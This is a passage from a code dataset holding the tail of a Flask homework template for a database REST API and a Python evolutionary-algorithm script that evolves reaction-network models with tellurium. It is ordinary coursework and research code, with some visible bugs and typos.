logging.getLogger()\nlogger.setLevel(logging.DEBUG)\n\n# The convention is that a compound primary key in a path has the elements sepatayed by \"_\"\n# For example, /batting/willite01_BOS_1960_1 maps to the primary key for batting\n_key_delimiter = \"_\"\n_host = \"127.0.0.1\"\n_port = 5002\n_api_base = \"/api\"\n\napplication = Flask(__name__)\n\n\ndef handle_args(args):\n \"\"\"\n\n :param args: The dictionary form of request.args.\n :return: The values removed from lists if they are in a list. This is flask weirdness.\n Sometimes x=y gets represented as {'x': ['y']} and this converts to {'x': 'y'}\n \"\"\"\n\n result = {}\n\n if args is not None:\n for k,v in args.items():\n if type(v) == list:\n v = v[0]\n result[k] = v\n\n return result\n\n# 1. Extract the input information from the requests object.\n# 2. Log the information\n# 3. Return extracted information.\n#\ndef log_and_extract_input(method, path_params=None):\n\n path = request.path\n args = dict(request.args)\n data = None\n headers = dict(request.headers)\n method = request.method\n url = request.url\n base_url = request.base_url\n\n try:\n if request.data is not None:\n data = request.json\n else:\n data = None\n except Exception as e:\n # This would fail the request in a more real solution.\n data = \"You sent something but I could not get JSON out of it.\"\n\n log_message = str(datetime.now()) + \": Method \" + method\n\n # Get rid of the weird way that Flask sometimes handles query parameters.\n args = handle_args(args)\n\n inputs = {\n \"path\": path,\n \"method\": method,\n \"path_params\": path_params,\n \"query_params\": args,\n \"headers\": headers,\n \"body\": data,\n \"url\": url,\n \"base_url\": base_url\n }\n\n # Pull out the fields list as a separate element.\n if args and args.get('fields', None):\n fields = args.get('fields')\n fields = fields.split(\",\")\n del args['fields']\n inputs['fields'] = fields\n\n log_message += \" received: \\n\" + json.dumps(inputs, indent=2)\n logger.debug(log_message)\n\n return inputs\n\n\ndef log_response(path, rsp):\n \"\"\"\n\n :param path: The path parameter received.\n :param rsp: Response object\n :return:\n \"\"\"\n msg = rsp\n logger.debug(str(datetime.now()) + \": \\n\" + str(rsp))\n\n\ndef get_field_list(inputs):\n return inputs.get('fields', None)\n\n\ndef generate_success(rsp_str=None, msg=None):\n if rsp_str:\n return Response(rsp_str, status=200, content_type=\"application/json\")\n\n if not msg:\n msg = 'General resource modification succeeds'\n\n rsp_str = json.dumps({\n 'status_code': 200,\n 'msg': msg\n })\n\n return Response(rsp_str, status=200, content_type=\"application/json\")\n\n\ndef generate_resource_not_found(msg=None):\n if not msg:\n msg = 'General resource not found'\n\n rsp_str = json.dumps({\n 'status_code': 404,\n 'err_msg': msg\n })\n\n return Response(rsp_str, status=404, content_type=\"application/json\")\n\n\ndef generate_invalid(ex=None, msg=None):\n if not msg:\n msg = 'General invalid request'\n\n if not ex:\n ex = 'Unknown reason'\n\n rsp_str = json.dumps({\n 'status_code': 400,\n 'err_msg': msg + str(ex)\n })\n\n return Response(rsp_str, status=400, content_type=\"application/json\")\n\n\ndef generate_error(ex=None, msg=None):\n \"\"\"\n\n This used to be more complicated in previous semesters, but we simplified for fall 2019.\n Does not do much now.\n :param status_code:\n :param ex:\n :param msg:\n :return:\n \"\"\"\n if not msg:\n msg = 'General internal server error'\n\n if not ex:\n ex = 'Unknown reason'\n\n rsp_str = json.dumps({\n 'status_code': 500,\n 'err_msg': msg + str(ex)\n })\n\n return Response(rsp_str, status=500, content_type=\"application/json\")\n\n\n####################################################################################################\n#\n# THESE ARE JUST SOME EXAMPLES TO HELP YOU UNDERSTAND WHAT IS GOING ON.\n#\n#\n\n# This function performs a basic health check. We will flesh this out.\n@application.route(\"/health\", methods=[\"GET\"])\ndef health_check():\n\n rsp_data = { \"status\": \"healthy\", \"time\": str(datetime.now()) }\n rsp_str = json.dumps(rsp_data)\n rsp = Response(rsp_str, status=200, content_type=\"application/json\")\n return rsp\n\n\n@application.route(\"/demo/\", methods=[\"GET\", \"PUT\", \"DELETE\", \"POST\"])\ndef demo(parameter):\n \"\"\"\n This simple echoes the various elements that you get for handling a REST request.\n Look at https://flask.palletsprojects.com/en/1.1.x/api/#incoming-request-data\n\n :param parameter: A list of the path parameters.\n :return: None\n \"\"\"\n\n inputs = log_and_extract_input(demo, { \"parameter\": parameter })\n\n msg = {\n \"/demo received the following inputs\" : inputs\n }\n\n rsp = Response(json.dumps(msg), status=200, content_type=\"application/json\")\n return rsp\n\n\n####################################################################################################\n#\n# YOU HAVE TO COMPLETE THE IMPLEMENTATION OF THE FUNCTIONS BELOW.\n#\n#\n@application.route(\"/api/databases\", methods=[\"GET\"])\ndef dbs():\n \"\"\"\n\n :return: A JSON object/list containing the databases at this endpoint.\n \"\"\"\n # -- TO IMPLEMENT --\n\n log_and_extract_input(dbs, None)\n\n # Your code goes here.\n\n # Hint: Implement the function in data_table_adaptor\n # NOTE: I'm using get_databases() function for this\n\n rsp_data = tuple(dta.get_databases())\n\n rsp_str = json.dumps(rsp_data)\n\n return Response(rsp_str, status=200, content_type=\"application/json\")\n\n\n@application.route(\"/api/databases/\", methods=[\"GET\"])\ndef tbls(dbname):\n \"\"\"\n\n :param dbname: The name of a database/schema\n :return: List of tables in the database.\n \"\"\"\n\n inputs = log_and_extract_input(tbls, (dbname))\n\n # Your code goes here.\n\n # Hint: Implement the function in data_table_adaptor\n # NOTE: I'm using get_tables() function for this\n\n rsp_data = tuple(dta.get_tables(dbname))\n\n rsp_str = json.dumps(rsp_data)\n\n return Response(rsp_str, status=200, content_type=\"application/json\")\n\n\n\n@application.route('/api///', methods=['GET', 'PUT', 'DELETE'])\ndef resource_by_id(dbname, resource, primary_key):\n \"\"\"\n\n :param dbname: Schema/database name.\n :param resource: Table name.\n :param primary_key: Primary key in the form \"col1_col2_..._coln\" with the values of key columns.\n :return: Result of operations.\n \"\"\"\n # Parse the incoming request into an application specific format.\n context = log_and_extract_input(resource_by_id, (dbname, resource, primary_key))\n\n #\n # SOME CODE GOES HERE\n #\n # -- TO IMPLEMENT --\n\n # Get our rdb_data_table and at the same time cache it if it doesn't exist yet\n try:\n rdb_data_table = dta.get_rdb_table(resource, dbname)\n except Exception as exception:\n print(exception)\n return generate_error(ex=exception, msg='No such database or table: ')\n\n # Split by '_' to get all the key fields\n key_fields = primary_key.split('_')\n\n if request.method == 'GET':\n #\n # SOME CODE GOES HERE\n #\n # -- TO IMPLEMENT --\n\n # Get field_list from context\n field_list = get_field_list(context)\n\n try:\n rsp_data = rdb_data_table.find_by_primary_key(key_fields, field_list)\n except Exception as exception:\n print(exception)\n return generate_error(ex=exception, msg='Fetch by primary key fails: ')\n\n if not rsp_data:\n msg = 'No entry with such primary key'\n return generate_resource_not_found(msg=msg)\n\n # To accommodate for datetime format, set the default to string\n rsp_str = json.dumps(rsp_data, default=str)\n\n return generate_success(rsp_str=rsp_str)\n\n elif request.method == 'DELETE':\n #\n # SOME CODE GOES HERE\n #\n # -- TO IMPLEMENT --\n try:\n rsp_data = rdb_data_table.delete_by_key(key_fields)\n except Exception as exception:\n print(exception)\n return generate_error(ex=exception, msg='Delete by primary key fails: ')\n\n return generate_success(msg='Rows deleted: ' + str(rsp_data))\n\n elif request.method == 'PUT':\n #\n # SOME CODE GOES HERE\n #\n # -- TO IMPLEMENT --\n new_values = context['body']\n\n try:\n rsp_data = rdb_data_table.update_by_key(key_fields, new_values)\n except Exception as exception:\n print(exception)\n return generate_error(ex=exception, msg='Update by primary key fails: ')\n\n if rsp_data == 0:\n is_data_found = rdb_data_table.find_by_primary_key(key_fields)\n\n if not is_data_found:\n msg = 'No entry with such primary key'\n return generate_resource_not_found(msg=msg)\n else:\n msg = 'The entry is found but the new values given are the same as old values'\n else:\n msg = 'The entry is succesfully updated'\n\n return generate_success(msg=msg)\n\n else:\n return generate_invalid()\n\n@application.route('/api//', methods=['GET', 'POST'])\ndef get_resource(dbname, resource_name):\n context = log_and_extract_input(get_resource, (dbname, resource_name))\n\n #\n # SOME CODE GOES HERE\n #\n # -- TO IMPLEMENT --\n\n # Get our rdb_data_table and at the same time cache it if it doesn't exist yet\n try:\n rdb_data_table = dta.get_rdb_table(resource_name, dbname)\n except Exception as exception:\n print(exception)\n return generate_error(ex=exception, msg='No such database or table: ')\n\n if request.method == 'GET':\n #\n # SOME CODE GOES HERE\n #\n # -- TO IMPLEMENT --\n\n # Get template from query params\n template = context['query_params']\n\n # Get field_list from context\n field_list = get_field_list(context)\n\n try:\n rsp_data = rdb_data_table.find_by_template(template, field_list)\n except Exception as exception:\n print(exception)\n return generate_error(ex=exception, msg='Fetch by template fails: ')\n\n if dta.is_empty(rsp_data):\n msg = 'No entry with such template'\n return generate_resource_not_found(msg=msg)\n\n # To accommodate for datetime format, set the default datetime to string\n rsp_str = json.dumps(rsp_data, default=str)\n\n return generate_success(rsp_str=rsp_str)\n\n elif request.method == 'POST':\n #\n # SOME CODE GOES HERE\n #\n # -- TO IMPLEMENT --\n new_record = context['body']\n\n try:\n rsp_data = rdb_data_table.insert(new_record)\n except Exception as exception:\n return generate_error(ex=exception, msg='Insert fails: ')\n\n return generate_success(msg='Entry succesfully inserted')\n\n else:\n return generate_invalid()\n\n\n@application.route('/api////', methods=['GET'])\ndef get_by_path(dbname, parent_name, primary_key, target_name):\n\n # Do not implement\n\n result = \" -- THANK ALY AND ARA -- \"\n\n return result, 501, {'Content-Type': 'application/json; charset=utf-8'}\n\n\n\n\n@application.route('/api/////',\n methods=['GET'])\ndef get_by_path_key(dbname, parent_name, primary_key, target_name, target_key):\n # Do not implement\n\n result = \" -- THANK ALY AND ARA -- \"\n\n return result, 501, {'Content-Type': 'application/json; charset=utf-8'}\n\n\n# You can ignore this method.\ndef handle_error(e, result):\n return \"Internal error.\", 504, {'Content-Type': 'text/plain; charset=utf-8'}\n\n# run the app.\nif __name__ == \"__main__\":\n # Setting debug to True enables debug output. This line should be\n # removed before deploying a production app.\n\n\n logger.debug(\"Starting HW2 time: \" + str(datetime.now()))\n application.debug = True\n application.run(host=_host, port=_port)","sub_path":"HW_Assignments/HW2F19-Template/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":12961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"640502790","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 27 20:52:33 2021\r\n\r\n@author: hsauro\r\n\"\"\"\r\n\r\nimport tellurium as te\r\nimport roadrunner\r\nimport teUtils as tu\r\nimport numpy as np\r\nimport random\r\nimport matplotlib.pyplot as plt\r\nimport readObjData\r\nimport evalFitness\r\nfrom commonTypes import TModel_\r\nimport copy, sys, os, math, getopt, json, time, zipfile\r\nimport evolUtils, uModel\r\nfrom uModel import TReaction\r\nfrom pprint import pprint\r\nfrom datetime import date\r\nfrom datetime import datetime\r\nimport keyboard\r\n\r\nfrom uLoadCvode import TCvode\r\nimport uLoadCvode\r\n\r\n# # Expected Output\r\n# timeStart 0.0\r\n# timeEnd 1.25\r\n# numberOfPoints 9\r\n# 5\r\n# 30.0\r\n# 5\r\n# 30.0\r\n# 5\r\n# 30.0\r\n# 5\r\n# 30.0\r\n# 5\r\n\r\nnDeleteReactions = 0\r\nnAddReaction = 0\r\nnParameterChanges = 0\r\ntimetaken = 0\r\n\r\ntu.buildNetworks.Settings.ReactionProbabilities.UniUi = 0.1\r\ntu.buildNetworks.Settings.ReactionProbabilities.UniBi = 0.4\r\ntu.buildNetworks.Settings.ReactionProbabilities.BiUni = 0.4\r\ntu.buildNetworks.Settings.ReactionProbabilities.BiBi = 0.1\r\n\r\n# [UNIUNI, [6], [1], 0.4044825260841083]\r\n\r\ndef readObjectiveFunction ():\r\n result = readObjData.ObjectiveFunctionData()\r\n f = open(\"objectivefunction.txt\", \"r\")\r\n\r\n astr = f.readline() # Dump the first comment line\r\n \r\n astr = f.readline()\r\n aList = astr.split ()\r\n result.timeStart = float (aList[1])\r\n\r\n astr = f.readline(); \r\n aList = astr.split ();\r\n result.timeEnd = float (aList[1])\r\n\r\n astr = f.readline()\r\n aList = astr.split ()\r\n result.numberOfPoints = int (aList[1])\r\n \r\n for i in range (result.numberOfPoints):\r\n result.outputData.append (float (f.readline()))\r\n f.close()\r\n return result\r\n\r\n\r\n# Not currently used\r\ndef mutateReactionOld (model):\r\n nReactions = model[TModel.reactionList][0]\r\n floats = model[2][0:model[TModel.nFloats]]\r\n n = random.randint(1, nReactions)\r\n # create a new reaction by overwriting the nth reaction\r\n rt = random.randint (0, 3)\r\n rxns = model[TModel.reactionList]\r\n rxn = rxns[n]\r\n rxn[0] = rt\r\n if rt == tu.buildNetworks.TReactionType.UNIUNI:\r\n rxn[1] = [random.choice(floats)]\r\n rxn[2] = [random.choice(floats)]\r\n if rt == tu.buildNetworks.TReactionType.BIUNI:\r\n rxn[1] = [random.choice(floats), random.choice(floats)]\r\n rxn[2] = [random.choice(floats)]\r\n if rt == tu.buildNetworks.TReactionType.UNIBI:\r\n rxn[1] = [random.choice(floats)]\r\n rxn[2] = [random.choice(floats), random.choice(floats)]\r\n if rt == tu.buildNetworks.TReactionType.BIBI:\r\n rxn[1] = [random.choice(floats), random.choice(floats)]\r\n rxn[2] = [random.choice(floats), random.choice(floats)]\r\n \r\n # rate constant\r\n rxn[3] = random.random()*10\r\n return model\r\n \r\n\r\ndef addReaction (model):\r\n global nAddReaction\r\n nAddReaction += 1\r\n floats = range(0, model.numFloats)\r\n rt = random.randint (0, 3) # Reaction type\r\n reaction = TReaction() \r\n reaction.reactionType = rt\r\n if rt == tu.buildNetworks.TReactionType.UNIUNI:\r\n r1 = [random.choice(floats)] \r\n p1 = [random.choice(floats)]\r\n reaction.reactant1 = r1[0]\r\n reaction.product1 = p1[0]\r\n \r\n if rt == tu.buildNetworks.TReactionType.BIUNI:\r\n r1 = [random.choice(floats), random.choice(floats)] \r\n p1 = [random.choice(floats)]\r\n reaction.reactant1 = r1[0]\r\n reaction.reactant2 = r1[1]\r\n reaction.product1 = p1[0]\r\n \r\n if rt == tu.buildNetworks.TReactionType.UNIBI:\r\n r1 = [random.choice(floats)]\r\n p1 = [random.choice(floats), random.choice(floats)]\r\n reaction.reactant1 = r1[0]\r\n reaction.product1 = p1[0]\r\n reaction.product2 = p1[1]\r\n \r\n if rt == tu.buildNetworks.TReactionType.BIBI:\r\n r1 = [random.choice(floats), random.choice(floats)] \r\n p1 = [random.choice(floats), random.choice(floats)]\r\n reaction.reactant1 = r1[0]\r\n reaction.reactant2 = r1[1]\r\n reaction.product1 = p1[0]\r\n reaction.product2 = p1[1]\r\n \r\n reaction.rateConstant = random.random()*defaultConfig['rateConstantScale']\r\n model.reactions.append (reaction)\r\n return model\r\n\r\n\r\ndef deleteReaction (model):\r\n global nDeleteReactions\r\n nDeleteReactions += 1\r\n nReactions = len (model.reactions)\r\n if nReactions > 2:\r\n n = random.randint(1, nReactions-1)\r\n del model.reactions[n]\r\n \r\n \r\n# Either delete or add a new reaction, 50/50 chance\r\ndef mutateReaction (model):\r\n if random.random() > 0.5:\r\n deleteReaction(model)\r\n else:\r\n addReaction(model) \r\n \r\n \r\ndef mutateRateConstant (model):\r\n global nParameterChanges\r\n nParameterChanges += 1\r\n # pick a random reaction\r\n nReactions = len (model.reactions)\r\n nth = random.randint(0, nReactions-1) # pick a reaction\r\n rateConstant = model.reactions[nth].rateConstant \r\n x = currentConfig['percentageChangeInParameter']*rateConstant\r\n \r\n change = random.uniform(-x,x)\r\n return nth, change\r\n\r\n\r\ndef computeFitness (population):\r\n for index, model in enumerate (population):\r\n #if keyboard.is_pressed(\"q\"):\r\n # print (\"keyboard break\")\r\n # sys.exit() \r\n evalFitness.computeFitnessOfIndividual (index, model, objectiveData)\r\n \r\n \r\ndef testSimulation (model, timeEnd, numberOfPoints):\r\n t, y = evalFitness.runSimulation (model, timeEnd, numberOfPoints)\r\n plt.plot (t, y)\r\n plt.show()\r\n \r\n \r\ndef refactor (model):\r\n nFloats = model[TModel_.nFloats]\r\n nBoundary = model[TModel_.nBoundary]\r\n reactions = model[TModel_.reactionList]\r\n nReactions = model[TModel_.reactionList][0]\r\n\r\n # Create map\r\n rm = list (model[TModel_.fullSpeciesList])\r\n # This is the mapping structure, two lists [[X], [Y]], X maps to Y\r\n rm = [rm] + [(list (range (len (model[TModel_.fullSpeciesList]))))]\r\n \r\n model[TModel_.fullSpeciesList] = rm[1]\r\n model[TModel_.boundaryList] = rm[1][nFloats:]\r\n \r\n for r in model[TModel_.reactionList][1:]: # don't include the number of reactions\r\n if r[0] == tu.buildNetworks.TReactionType.UNIUNI:\r\n oldr = r[1][0]\r\n new = rm[0].index(oldr)\r\n r[1][0] = new\r\n\r\n oldr = r[2][0]\r\n new = rm[0].index(oldr)\r\n r[2][0] = new\r\n\r\n if r[0] == tu.buildNetworks.TReactionType.BIUNI:\r\n oldr = r[1][0]; r[1][0] = rm[0].index(oldr); \r\n oldr = r[1][1]; r[1][1] = rm[0].index(oldr); \r\n \r\n oldr = r[2][0]; r[2][0] = rm[0].index(oldr)\r\n \r\n if r[0] == tu.buildNetworks.TReactionType.UNIBI:\r\n oldr = r[1][0]; r[1][0] = rm[0].index(oldr); \r\n \r\n oldr = r[2][0]; r[2][0] = rm[0].index(oldr)\r\n oldr = r[2][1]; r[2][1] = rm[0].index(oldr)\r\n\r\n if r[0] == tu.buildNetworks.TReactionType.BIBI:\r\n oldr = r[1][0]; r[1][0] = rm[0].index(oldr); \r\n oldr = r[1][1]; r[1][1] = rm[0].index(oldr); \r\n \r\n oldr = r[2][0]; r[2][0] = rm[0].index(oldr)\r\n oldr = r[2][1]; r[2][1] = rm[0].index(oldr)\r\n \r\n return model\r\n \r\ndef refactorMmodel(model):\r\n find = model[TModel_.fullSpeciesList]\r\n space = model[TModel_.reactionList]\r\n for i, rxn in enumerate(space):\r\n if i == 0: continue\r\n else:\r\n for ii, species in enumerate(rxn):\r\n if (ii>0 and ii<3):\r\n for x in range(len(species)):\r\n species[x] = find.index(species[x]) #essentially you are asking what \r\n #the number should be and change it\r\n return([model[0],model[1],find,model[4], False, 0])\r\n\r\ninitialConditions = [1,5,9,3,10,3,7,1,6,3,10,11,4,6,2,7,1,9,5,7,2,4,5,10,4,1,6,7,3,2,7,8]\r\n\r\n\r\ndef makeModel (nSpecies, nReactions):\r\n model = tu.buildNetworks.getRandomNetworkDataStructure(nSpecies, nReactions) \r\n nFloats = len (model[0])\r\n nBoundary = len (model[1])\r\n model.insert (0, nFloats)\r\n model.insert (1, nBoundary)\r\n # Append boundary to float list\r\n model[2] = list (np.append (model[2], model[3]))\r\n model.insert (4, initialConditions[:nFloats+nBoundary])\r\n model.append (0.0) # Append fitness variable\r\n \r\n model = refactor (model)\r\n \r\n amodel = uModel.TModel()\r\n amodel.numFloats = nFloats\r\n amodel.numBoundary = nBoundary\r\n amodel.cvode = TCvode(uLoadCvode.CV_BDF)\r\n for r in model[TModel_.reactionList][1:]:\r\n reaction = uModel.TReaction()\r\n reaction.reactionType = r[0]\r\n \r\n reaction.reactant1 = r[1][0]\r\n if reaction.reactionType == tu.buildNetworks.TReactionType.BIUNI or reaction.reactionType == tu.buildNetworks.TReactionType.BIBI:\r\n reaction.reactant2 = r[1][1]\r\n \r\n reaction.product1 = r[2][0]\r\n if reaction.reactionType == tu.buildNetworks.TReactionType.UNIBI or reaction.reactionType == tu.buildNetworks.TReactionType.BIBI:\r\n reaction.product2 = r[2][1]\r\n \r\n reaction.rateConstant = r[3]\r\n amodel.reactions.append (reaction)\r\n amodel.initialConditions = np.zeros (model[TModel_.nFloats] + model[TModel_.nBoundary])\r\n for index, ic in enumerate (model[TModel_.initialCond]):\r\n amodel.initialConditions[index] = ic\r\n amodel.fitness = 0\r\n \r\n return amodel\r\n \r\ndef clonePopulation (population):\r\n p = []\r\n for pop in population:\r\n p.append (uModel.clone (pop))\r\n return p\r\n \r\ndef savePopulation (gen, population):\r\n p = clonePopulation (population)\r\n savedPopulations.append (p)\r\n \r\ndef saveRun (seed, saveFileName):\r\n global timetaken\r\n zf = zipfile.ZipFile (saveFileName, mode=\"w\", compression=zipfile.ZIP_DEFLATED)\r\n try:\r\n json_string = json.dumps(fitnessArray)\r\n zf.writestr(\"fitnessList.txt\", json_string)\r\n \r\n astr = evolUtils.convertToAntimony2 (newPopulation[0]);\r\n zf.writestr(\"best_antimony.ant\", astr) \r\n zf.writestr (\"seed_\" + str(seed) + \".txt\", str (seed))\r\n \r\n zf.writestr (\"config.txt\", json.dumps (currentConfig) + '\\n') \r\n \r\n today = date.today()\r\n now = datetime.now()\r\n summaryStr = 'Date:' + today.strftime(\"%b-%d-%Y\") + '\\n'\r\n summaryStr += 'Time:' + now.strftime(\"%H:%M:%S\") + '\\n'\r\n summaryStr += 'Time taken in seconds:' + str (math.trunc (timetaken*100)/100) + \"\\n\"\r\n summaryStr += 'Time taken (hrs:min:sec):' + str (time.strftime(\"%H:%M:%S\", time.gmtime(timetaken))) + \"\\n\"\r\n summaryStr += '#Seed=' + str (seed) + '\\n'\r\n summaryStr += '#Final_number_of_generations=' + str (len (savedPopulations)) + '\\n'\r\n summaryStr += '#Size_of_population=' + str (sizeOfPopulation) + '\\n'\r\n summaryStr += '#Number_of_added_reactions=' + str(nAddReaction) + '\\n'\r\n summaryStr += '#Number_of_deleted_reactions=' + str (nDeleteReactions) + '\\n'\r\n summaryStr += '#Number_of_parameter_changes=' + str (nParameterChanges) + '\\n' \r\n summaryStr += '#Final_fitness=' + str(newPopulation[0].fitness) + '\\n'\r\n zf.writestr('summary.txt', summaryStr)\r\n \r\n for index, pop in enumerate (savedPopulations):\r\n for j in range (len (pop)):\r\n fileName = \"populations/generation_\" + str(index) + '/individual_' + str (j) + '.txt'\r\n popSummary = '# Fitness = ' + str (pop[j].fitness) + '\\n'\r\n popSummary += evolUtils.convertToAntimony2 (pop[j]); \r\n zf.writestr (fileName, popSummary) \r\n finally:\r\n zf.close()\r\n pass\r\n\r\ndef plotFitnessPopulationHist (population):\r\n data = []\r\n for model in population:\r\n data.append (model.fitness)\r\n plt.hist (data)\r\n plt.show()\r\n \r\ndef plotFitnessOfIndividuals(population):\r\n data = []\r\n for model in population:\r\n data.append (model.fitness)\r\n plt.plot (data)\r\n plt.show()\r\n \r\ndef plotPopulationPlots (population):\r\n n = math.trunc (math.sqrt (len (population)))\r\n fig, axs = plt.subplots(n,n,figsize=(13,11))\r\n count = 0\r\n for i in range (n):\r\n for j in range (n):\r\n t, y = evalFitness.runSimulation (population[count], 1.25, 100)\r\n axs[i, j].plot(t, y)\r\n count += 1\r\n\r\ndef plotFitnessArray():\r\n plt.plot (fitnessArray)\r\n plt.show()\r\n \r\ndef plotFitnesssFromFile (fileName):\r\n data = np.loadtxt(fileName, delimiter=',')\r\n plt.plot(data[:,0], data[:,1])\r\n plt.show()\r\n\r\ndef displayFitness (population):\r\n for p in population:\r\n primportnt (p.fitness)\r\n \r\ndef test(tag):\r\n if gen == 7:\r\n evalFitness.computeFitnessOfIndividual (newPopulation[0], objectiveData)\r\n print (\"fitness at 7 (tag) = \", tag, newPopulation[0].fitness)\r\n\r\ndef printModel (model):\r\n print (\"Model details:\")\r\n print ('Num floats:', model.numFloats, 'num boundary:', model.numBoundary, 'Num reactions:', len (model.reactions), 'fitness:', math.trunc (model.fitness*100)/100);\r\n for r in model.reactions:\r\n print (r.reactionType, r.reactants, r.products, r.rateConstant)\r\n\r\ndef writeOutConfigForModel (f, config):\r\n f.write (\"# \" + json.dumps (config))\r\n f.write ('\\n')\r\n\r\ndef pause():\r\n programPause = input(\"Press the key to continue...\")\r\n\r\n# ---------------------------------------------------------------------\r\n\r\ndefaultConfig = {\"maxGenerations\": 450,\r\n \"sizeOfPopulation\": 100,\r\n \"numSpecies\": 10,\r\n \"numReactions\": 14,\r\n \"rateConstantScale\": 50,\r\n \"probabilityMutateRateConstant\": 0.7, # 0.9 much worse\r\n \"percentageCloned\": 0.1,\r\n \"percentageChangeInParameter\": 0.15,\r\n \"seed\": -1, # means no specific seed\r\n \"threshold\": 10.5, # a fitness below this we stop\r\n \"frequencyOfOutput\": 10,\r\n \"multi\": {\"item 1\": \"item 2\"}, \r\n \"key2\": \"value2\"}\r\n\r\nseed = -1; maxGenerations = -1\r\nnewConfigFile = ''\r\nargv = sys.argv[1:]\r\noptions, args = getopt.getopt(argv, 's:g:c:hv', [])\r\nfor opt, arg in options: \r\n if opt in ('-s', ''):\r\n seed = int (arg)\r\n if opt in ('-g', ''):\r\n maxGenerations = int(arg)\r\n if opt in ('-c', ''):\r\n newConfigFile = arg\r\n if not newConfigFile.endswith('.json'):\r\n newConfigFile += '.json'\r\n print (newConfigFile + ' in use') \r\n if opt in ('-v', ''):\r\n print (\"version 1.0\")\r\n sys.exit()\r\n if opt in ('-h', ''):\r\n print (\"Help:\") \r\n print (\"Set the seed: -s 54545353\")\r\n print (\"Set the number of generations to use: -g 1000\")\r\n sys.exit()\r\n \r\nprint (\"------------------------------\")\r\nprint (\"Press ctrl+q to interupt a run\")\r\nprint (\"------------------------------\\n\")\r\nif not os.path.exists('defaultConfig.json'):\r\n print (\"not os\")\r\n with open('defaultConfig.json', 'w') as f:\r\n json.dump(defaultConfig, f) \r\n \r\nif newConfigFile == '':\r\n print (\"Default configuration in use\")\r\n currentConfig = defaultConfig\r\nelse:\r\n currentConfig = newConfigFile() \r\n\r\n# revert to default if not set\r\nif maxGenerations == -1:\r\n maxGenerations = currentConfig['maxGenerations']\r\n \r\nprint (\"Maximum Generations = \", maxGenerations) \r\n\r\nobjectiveData = readObjectiveFunction() \r\n# seed can be set at the cmd line using -s 1234\r\n# otherwise check config file, if that is not set\r\n# draw a random seed\r\nif seed == -1:\r\n if defaultConfig['seed'] == -1:\r\n seed = random.randrange(sys.maxsize)\r\n else:\r\n seed = currentConfig['seed']\r\nprint ('seed = ', seed)\r\n#seed = 456789\r\nrandom.seed(seed)\r\n\r\ntu.buildNetworks.Settings.allowMassViolatingReactions = True\r\ntu.buildNetworks.Settings.rateConstantScale = currentConfig['rateConstantScale']\r\n\r\n# Create initial random population\r\nsizeOfPopulation = currentConfig['sizeOfPopulation']\r\npopulation = [] \r\nfor i in range (sizeOfPopulation): \r\n amodel = makeModel (currentConfig['numSpecies'], currentConfig['numReactions'])\r\n population.append (amodel)\r\n\r\nmodel = population[0]\r\ntopElite = math.trunc (defaultConfig['percentageCloned']*sizeOfPopulation)\r\n\r\n# Main loop\r\nfitnessArray = []\r\nsavedPopulations = []\r\nstartTime = time.time()\r\nfor gen in range (0, maxGenerations): \r\n\r\n computeFitness (population) \r\n \r\n # Sort the population according to fitness\r\n population.sort (key=lambda x: x.fitness)\r\n \r\n # Create the next population\r\n newPopulation = []\r\n if gen % currentConfig['frequencyOfOutput'] == 0:\r\n print(flush=True)\r\n print (\"gen[\" + str (gen)+ \"] fitness=\", \r\n \"{:.4f}\".format(population[0].fitness), \r\n str(len (population[0].reactions)), end='',flush=True)\r\n else:\r\n print ('.', end='',flush=True) \r\n # Record the best fitness\r\n fitnessArray.append (population[0].fitness)\r\n \r\n # Clone in the best individual from the current population\r\n newPopulation.append (uModel.clone (population[0]))\r\n # Copy over the top elite of the popoulation\r\n for i in range (topElite-1):\r\n newPopulation.append (uModel.clone (population[i]))\r\n \r\n # For the remainder use tournament selction on pairs of\r\n # individuals, picking the best and mutating it. \r\n remainder = sizeOfPopulation - topElite\r\n \r\n for i in range (remainder):\r\n\r\n # pick two models at random, then pick the best and mutate it\r\n r1 = random.randint(1, sizeOfPopulation-1)\r\n r2 = random.randint(1, sizeOfPopulation-1) \r\n \r\n if population[r1].fitness < population[r2].fitness:\r\n if random.random() > currentConfig['probabilityMutateRateConstant']:\r\n mutateReaction(population[r1]) \r\n else:\r\n n, change = mutateRateConstant (population[r1]) \r\n amodel = uModel.clone (population[r1])\r\n amodel.reactions[n].rateConstant += change\r\n newPopulation.append (amodel)\r\n else:\r\n if random.random() > currentConfig['probabilityMutateRateConstant']:\r\n mutateReaction(population[r2]) \r\n else:\r\n n, change = mutateRateConstant (population[r2]) \r\n amodel = uModel.clone (population[r2])\r\n amodel.reactions[n].rateConstant += change;\r\n newPopulation.append (amodel)\r\n \r\n if keyboard.is_pressed(\"ctrl+q\"):\r\n print (\"keyboard break\")\r\n sys.exit() \r\n \r\n population = newPopulation\r\n savePopulation (gen, population)\r\n \r\n if population[0].fitness < currentConfig['threshold']:\r\n break\r\n\r\nprint('\\n')\r\nif newPopulation[0].fitness < 100:\r\n print (\"Success.......\")\r\n saveFileName = \"Model_\" + str (seed) + \".zip\"\r\n print(\"Saving entire state to --- \", saveFileName)\r\n saveRun (seed, saveFileName)\r\nelse:\r\n print (\"Trial failed.....\") \r\n saveFileName = \"FAIL_Model_\" + str (seed) + \".zip\"\r\n print(\"Saving entire state to --- \", saveFileName)\r\n saveRun (seed, saveFileName)\r\n \r\n \r\ntimetaken = time.time() - startTime\r\n \r\nprint(\"Final fitness = \", population[0].fitness)\r\nprint (\"Time taken in seconds = \", math.trunc (timetaken*100)/100)\r\nprint (\"Time taken (hrs:min:sec): \", time.strftime(\"%H:%M:%S\", time.gmtime(timetaken)))\r\nprint (\"Seed = \", seed)\r\nprint ('Number of added reactions = ', nAddReaction)\r\nprint ('Number of deleted reactions = ', nDeleteReactions)\r\nprint ('Number of parameter changes = ', nParameterChanges)\r\n# if newPopulation[0].fitness < 100:\r\n# astr = evolUtils.convertToAntimony2 (newPopulation[0]);\r\n# print (astr)\r\n# f = open(\"model_\" + str(seed) + \".txt\", \"w\")\r\n# writeOutConfigForModel (f, currentConfig)\r\n# f.write (\"Time taken in seconds = \" + str (math.trunc (timetaken*100)/100))\r\n# f.write (\"Time taken (hrs:min:sec): \" + str (time.strftime(\"%H:%M:%S\", time.gmtime(timetaken))))\r\n# f.write ('# Seed = ' + str (seed) + '\\n')\r\n# f.write ('# Number of added reactions = ' + str(nAddReaction) + '\\n')\r\n# f.write ('# Number of deleted reactions = ' + str 